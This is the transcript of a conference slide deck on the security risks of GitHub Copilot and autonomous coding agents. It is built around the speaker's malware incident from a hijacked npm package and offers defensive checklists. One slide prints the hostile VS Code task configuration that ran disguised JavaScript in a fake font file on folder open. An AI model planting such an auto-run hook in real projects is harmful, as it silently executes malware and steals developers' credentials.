Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Using GitHub Copilot Safely: What Developers Ne...

Using GitHub Copilot Safely: What Developers Need to Know About AI, Dependencies and Security

GitHub Copilot can make developers dramatically faster, but giving AI more access to our code, terminal, dependencies and development tools also introduces new security considerations.

In this practical session, we'll look at some of the security risks developers should be aware of when using GitHub Copilot and AI-assisted development workflows.

Using recent real-world npm supply-chain attacks as a case study, we'll explore how malicious code can enter a seemingly trusted development environment and why developers need to think beyond just the code they write.

We'll cover practical advice around:

* Reviewing AI-generated code and commands
* Understanding what Copilot and agents have access to
* MCP tools and permissions
* npm packages and dependency security
* Secrets, tokens and credentials
* Repository and developer-tool configuration
* CI/CD security
* Human review and useful guardrails

The goal is not to discourage developers from using Copilot. It's to help us use it confidently while understanding the new security responsibilities that come with AI-assisted development.

Avatar for Abed Matini

Abed Matini

October 03, 2026

More Decks by Abed Matini

Other Decks in Technology

Transcript

  1. WHAT HAPPENED I was shipping fast. Then my laptop was

    cut off. 10:32 AM 01 Building an MVP Claude in VS Code, in Auto mode Network Disabled Your administrator has caused Microsoft Defender for Endpoint to disconnect your device. Contact your help desk. 02 Security software isolated it from the network Dismiss 03 Reconstructed from a photo taken on 20 Aug 2026 Laptop cut off Wiped and reinstalled Pulled my repo, ran npm—it “called home” again Calling home: malware contacting the attacker’s server for instructions. That server is called C2 (command and control). DEV DAYS CAPE TOWN 2026 02 / 26
  2. BEFORE THE ALERT My workflow felt normal Describe Install Tell

    the agent what to build It adds the packages it needs Run Ship It runs, tests and fixes Minutes instead of hours DEV DAYS CAPE TOWN 2026 “ Every individual action looked ordinary. In Auto mode, the agent approves its own file edits and terminal commands. I wasn’t reviewing each step—that was the point. 03 / 26
  3. THE INVESTIGATION First lead: an infected file in my repo

    01 02 03 Suspicious code Attacker connection File restored Claude found obfuscated code inside vite.config.js That code appeared to contact the C2 server We replaced it with the clean version 04 It came back The next run contacted C2 again Fixing the file didn’t fix the problem. The malware was not living in my project. DEV DAYS CAPE TOWN 2026 04 / 26
  4. RECONSTRUCTED FROM THE INCIDENT PHOTO The “fix” didn’t hold Can

    you test now if you can run the project with no issue locally? It ran whenever npm ran CLAUDE · AUTO MODE “The malware fired again — from a fresh npm-cli.js process, not from Vite this time. vite.config.js was never the real infection point. Something is hooking into npm / node invocations directly. Killing it and checking .npmrc and NODE_OPTIONS .” POWERSHELL WHAT WE LEARNED BASH Kill process + check NODE_OPTIONS Check .npmrc files Stop-Process -Id … -Force [Environment]::GetEnvironmentVariable( "NODE_OPTIONS", "User" ) --- project .npmrc --ignore-scripts=true audit=true The malware started from npm itself, so it wasn’t tied to one file in the project. STILL UNKNOWN Where it came from How it got in, and how it kept coming back. The drive is now with forensics. Wording reconstructed from the phone photo; commands condensed for readability. DEV DAYS CAPE TOWN 2026 05 / 26
  5. THE TURNING POINT The machine was compromised, not just the

    repo “The weight of evidence says this machine was compromised first, and the repo file was a casualty or symptom—not necessarily the origin.” Claude’s conclusion at the time. It also said it couldn’t be 100% certain without endpoint forensics. CLAUDE RECOMMENDED EVERY TEST RUN Stop all npm, node and npx activity and escalate to IT security. Started the malware again. Running the project was now part of the problem. MY DECISION “Stop running it.” DEV DAYS CAPE TOWN 2026 I stopped the agent and moved from debugging to incident response. 06 / 26
  6. FINDING THE SOURCE The source: a compromised npm package COMPROMISED

    VERSIONS [email protected] · [email protected] ONE WAS ON MY MACHINE How the campaign worked, according to JFrog Security Research: Package hijacked Folder opened Hidden code ran Next step looked up Access stolen Attackers published malicious versions of two real npm packages. Opening the package folder in VS Code as trusted started a hidden task. Node ran JavaScript disguised as a font file (.woff2). It read public blockchain data to find where to download more code. The final payload ran attacker commands and stole credentials. DEV DAYS CAPE TOWN 2026 07 / 26
  7. THE QUIET TRIGGER No install script needed: VS Code started

    it 01 · HARMLESS NAME .vscode/tasks.json “eslint-check” looks like a normal lint task. 02 · FAKE FONT { "label": "eslint-check", "command": "node ./public/fonts/fa-solid-400.woff2", "runOptions": { "runOn": "folderOpen" } } The .woff2 file is really JavaScript, run by Node. 03 · AUTO-START “folderOpen” runs it as soon as the trusted folder opens. Most npm security advice targets install scripts (code that runs during npm install). This attack skipped them entirely. DEV DAYS CAPE TOWN 2026 08 / 26
  8. WHY IT WAS HARD TO STOP The package contained directions—not

    the destination 02 · DIRECTIONS 03 · DESTINATION 01 · PACKAGE Blockchain “dead Small loader drop” The npm package carried only a small loader, not the real malware. Like a note left in a public place: the loader read a public blockchain transaction to find its next step. Downloaded payload It downloaded and ran the real malware: a backdoor that runs commands and steals credentials. Why this matters: attackers could change the malware at any time without publishing a new npm version. DEV DAYS CAPE TOWN 2026 09 / 26
  9. THE BLAST RADIUS A developer laptop holds the keys to

    everything JFrog found the payload collecting data from all of these: Cloud keys Browser sessions Password vaults My laptop Git + SSH keys Crypto wallets VS Code data Each of these opens doors to other systems: GitHub, cloud accounts, production. DEV DAYS CAPE TOWN 2026 10 / 26
  10. THE CENTRAL CLAIM Auto mode wasn’t the malware. It was

    the amplifier. NOT THE CAUSE THE AMPLIFIER The malicious code came from a compromised npm package— not from Claude. Every time the agent ran the project, the malware ran again— with my permissions. Speed Permissions Visibility Many commands ran in minutes, with few pauses to question them. The agent ran as me: my files, my tokens, my network. Commands ran in a terminal I wasn’t reading line by line. CONFIRMED PUBLISHED MECHANISM · JFROG UNDER FORENSICS Hijacked package on my machine · malware re-ran from npm · C2 contact returned after the rebuild Folder-open task → fake font → blockchain dead drop → backdoor → credential stealer How the trigger fired on my machine · what my repo carried back after the wipe DEV DAYS CAPE TOWN 2026 11 / 26
  11. OWASP GENAI MAPPING My incident maps to five OWASP AI

    risks LLM03 LLM06 ASI03 Supply Chain Excessive Agency Identity & Privilege Abuse A compromised npm package entered my project. The agent could run commands without asking me. The agent ran with all of my credentials. ASI04 ASI05 Agentic Supply Chain Unexpected Code Execution Packages and tools the agent relies on can be poisoned. Running the project re-executed the malware. LLM = OWASP Top 10 for LLM Applications (2025) · ASI = OWASP Top 10 for Agentic Applications (2026) DEV DAYS CAPE TOWN 2026 12 / 26
  12. DESIGN PRINCIPLE Least privilege is not enough. Use least agency.

    Maximum convenience REDUCE Can run any command Long-lived credentials Unrestricted internet access Installs packages silently Bounded autonomy Only the tools the task needs SMALLER BLAST RADIUS Short-lived credentials Approved websites only Asks before risky actions Least agency (OWASP): limit what the agent may decide and do on its own, not just what it can access. DEV DAYS CAPE TOWN 2026 13 / 26
  13. A SAFER AGENT WORKSTATION Move the agent away from your

    crown jewels YOUR REAL LAPTOP YOU DISPOSABLE WORKSPACE APPROVE WHAT CROSSES Passwords Accounts Your review Agent Limited shell Dependencies Run the agent in a VM, container or cloud dev environment with limited internet access. If it gets infected, throw it away—your secrets were never in it. DEV DAYS CAPE TOWN 2026 14 / 26
  14. CONTROLS THAT MATTER Three layers: prevent, contain, recover 01 02

    03 Prevent Contain Recover Pin package versions Sandbox the agent Isolate the machine Review lockfile changes Limit internet access Keep evidence Check where packages come from Use short-lived credentials Rotate credentials from a clean device Inspect .vscode/tasks.json Log what tools run Rebuild and monitor LESSON LEARNED Wiped ≠ recovered DEV DAYS CAPE TOWN 2026 Stolen tokens keep working until revoked—and your repo can carry the infection back. 15 / 26
  15. FROM MY STORY TO YOURS Same risk, different tool MY

    INCIDENT ≈ Claude in VS Code · Auto mode GITHUB COPILOT Agent mode in VS Code Edit files Run commands Use tools Across your whole project. Install packages, start servers, run scripts. Reach external systems through MCP. The lesson isn’t about one vendor. It’s about how much authority you give the agent. DEV DAYS CAPE TOWN 2026 16 / 26
  16. GITHUB COPILOT MODES Each mode gives Copilot different powers 01

    02 03 Ask Plan Agent Answers questions about your code. Doesn’t Researches the task and writes a plan for you Edits files, runs terminal commands and uses change files. to review. Doesn’t change files. tools until the task is done. Before choosing a mode, ask: What can it read, run, change and contact? DEV DAYS CAPE TOWN 2026 17 / 26
  17. AI-GENERATED CODE AND COMMANDS Review before it runs—not after Generated

    code Generated commands Read the complete diff, including configuration files Look up unfamiliar flags, pipes and downloaded scripts Verify authentication, authorization and input boundaries Pause destructive, admin-level or recursive operations Question every new dependency and lockfile change Check whether secrets or source code leave the machine Test failure paths—not only the happy path Prefer small commands that are easy to undo Once a command has run, a good explanation can’t undo it. DEV DAYS CAPE TOWN 2026 18 / 26
  18. MCP TOOLS AND PERMISSIONS MCP turns context into capability MCP

    (Model Context Protocol) lets Copilot use outside tools—so it can act, not just read. Copilot MCP server External system Decides to use a tool Connects Copilot to the tool GitHub · cloud · databases SCOPE IDENTITY WRITES EVIDENCE Expose only the tools needed for this task. Use separate, short-lived credentials. Require confirmation for changes and publishing. Log tool calls outside the agent workspace. DEV DAYS CAPE TOWN 2026 19 / 26
  19. SECRETS, TOKENS AND CREDENTIALS If the agent can read it,

    assume an attacker can too .env + shell Git + cloud CLIs Browser + vaults CI/CD Environment variables and local config Cached tokens and credential helpers Sessions, extensions and synced data Repository secrets and deployment identities Use short-lived, narrowly scoped credentials. After an incident, rotate them from a clean device—never from the infected one. DEV DAYS CAPE TOWN 2026 20 / 26
  20. REPOSITORY CONFIGURATION + CI/CD Automation files are executable code Files

    that can run code CI/CD guardrails .github/workflows/ Pin third-party actions to exact commits .vscode/tasks.json — used in my incident Give GITHUB_TOKEN the minimum permissions Package scripts, Git hooks and generators Keep secrets away from untrusted pull requests Dev containers, Dockerfiles and build config Require approval before deploying Review changes to these files as carefully as application code. DEV DAYS CAPE TOWN 2026 21 / 26
  21. PRACTICAL COPILOT CHECKLIST Three checkpoints for safer speed 01 02

    03 Before you start While it works Before you merge Choose the least powerful mode Read commands before they run Read the complete diff Remove long-lived credentials Review new packages and scripts Check config and CI permissions Check which tools and MCP servers are Approve only what you understand Run tests, scans and secret checks on DEV DAYS CAPE TOWN 2026 22 / 26
  22. TAKEAWAYS Keep the speed. Redesign the trust. 01 02 03

    Autonomy is not trust Your laptop is a high-value target Pause where it matters The more an agent can do alone, the tighter its boundaries should be. Protect it like a production system. Ask before installs, secrets, internet access and publishing. “Give agents a smaller room in which to be fast.” DEV DAYS CAPE TOWN 2026 23 / 26
  23. QUESTIONS What would you change before your next autonomous build?

    JFROG RESEARCH Hijacked npm Packages, VS Code Tasks & Blockchain Dead Drops OWASP GENAI SECURITY PR OJE C T LLM Top 10 · Agentic Top 10 · Security Guides SCAN FOR THE ARTICLE DEV DAYS CAPE TOWN 2026 24 / 26
  24. STAY CONNECTED Let’s continue the conversation LINKEDIN Abed Matini Software

    Engineer Questions, ideas, or your own AI-security story—I’d be glad to continue the discussion. SCAN TO CONNECT DEV DAYS CAPE TOWN 2026 25 / 26